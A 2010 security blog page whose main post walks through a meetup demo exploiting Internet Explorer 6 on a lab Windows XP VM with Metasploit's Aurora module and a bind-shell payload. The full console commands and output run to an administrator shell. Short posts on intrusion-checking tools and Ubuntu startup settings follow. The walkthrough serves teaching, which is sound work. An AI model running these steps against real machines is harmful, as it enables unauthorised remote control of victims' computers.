Search This Blog

Wednesday, March 31, 2010

[n|u Delhi Presentations] 27th March 2010...

There was a scheduled null-meet on 27th March 2010 in IIT delhi, where I, actually, was supposed to JUST attend the meet. In fact, I was little excited to attend the presentation by Vishwas, who was going to deliver some live demonstration(actually, thats what I thought before coming to the meet[:(], but that doesn't matter) on IE8 being exploited on Windows 7 machine with ASLR and DEP enabled. [:-o]

Yes, you heard it right!
This was done by Peter Vreugdenhil in pwn2own 2010 CanSecWest contest.

You may find the detailed report here.

Well, I just thought of showing something live demonstration, so to clear some very basic terms like, a Vulnerability and an Exploit.
This can be good start for those who are new to these terms.

A vulnerability is loophole in a service.
An exploit is the penetration/doing something unusual(which is not supposed to be done by that service), by using the vulnerability.
As simple, as it sounds :)

In general scenario, an exploit is divided in two parts. The vulnerability exposure and the payload.

The payload set of machine language instructions in form of opcodes, so as to interact with the processor, and execute the part of code of attacker's choice.

The live demonstration, was about exploit IE 6 on windows XP SP2 box, with Aurora exploit(which, Google claims to be used by Chinese hackers, for the recent attacks on their servers in China). I used Metasploit framework to develop the exploit in a quicker way, and set the parameters accordingly.

So, following are the all things, what I did while demonstrating it:

1. Started the Metasploit using 'msfconsole' on my Ubuntu host
user@localhost:~$ msfconsole
                                 _       _
      _                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                    |_|

  =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 537 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)

msf >


2. Searched for the 'aurora' string (as I was knowing, the such kind of keyword exists)
msf > search -t exploit aurora
[*] Searching loaded modules for pattern 'aurora'...

Exploits
========

Name                             Rank    Description
----                             ----    -----------
windows/browser/ms10_002_aurora  normal  Internet Explorer "Aurora" Memory Corruption

msf >

3. Selected the module
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >


4. Show parameters to be set
msf exploit(ms10_002_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

Id  Name
--  ----
0   Automatic


msf exploit(ms10_002_aurora) >


5. Set server as my Ubuntu host, so I gave the IP of my 'vmnet8' adapter, as the guest XP was on NAT
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1


6. Set URIPATH to "/" for the convenience
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /


7. And here comes the second part of the Exploit i.e. Payload. I set the payload as windows/shell/bind_tcp, which is supposed to listen for a connection, Spawn a piped command shell
msf exploit(ms10_002_aurora) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp


8. At last, before you are going to exploit the target machine, re-check the parameters
msf exploit(ms10_002_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     192.168.188.1    yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/shell/bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST                      no        The target address


Exploit target:

Id  Name
--  ----
0   Automatic


msf exploit(ms10_002_aurora) >


9. Run the exploit
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.


10. Now put the URL in victim's machine


11. In console window, you can see one session is opened
msf exploit(ms10_002_aurora) >
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
[*] Started bind handler
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.188.138
[*] Started bind handler
[*] Command shell session 1 opened (192.168.188.1:54460 -> 192.168.188.138:4444)


12. Interacting with session, by specifying session number will give u...
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>



..............Done!!!

Phheewww......

OMG, I wrote that all? ;;)
Posted by at No comments:

Tuesday, March 23, 2010

the blog title...

I have always been keen and telling others about
"Keeping your own system Secure, before you go behind others."
So, I just wanted to name few tools, which may help you investigate, in case, you feel like, been-infiltrated (you know, what I mean :P)

Windows:
-TCPView
-Process Explorer
-Process Monitor

Though, there is a common command line tool in windows as well as in Linux netstat.
Also, a network sniffer like Wireshark can do a lot to aid.
Posted by at No comments:

Remove service from startup (Ubuntu)...

Remove unwanted application after a system boot...
also, all of services used to be residing in /etc/init.d/ folder
run command as follows...

sudo update-rc.d <service-name> remove
Posted by at No comments:

Changing default runlevel in Ubuntu...

-Edit /etc/init/rc-sysinit.conf using any of your favourite editor(mine is nano ;))
-Find env DEFAULT_RUNLEVEL which should be set as 2, by default.
-Change it to your desirable runlevel.
-Give a reboot and you are done!

Here is a quick reference
Debian Linux runlevels
ID Description
0 Halt
1 Single-User mode
2-5 Full Multi-User with console logins and display manager if installed
6 Reboot
Posted by at No comments:
Subscribe to: Posts (Atom)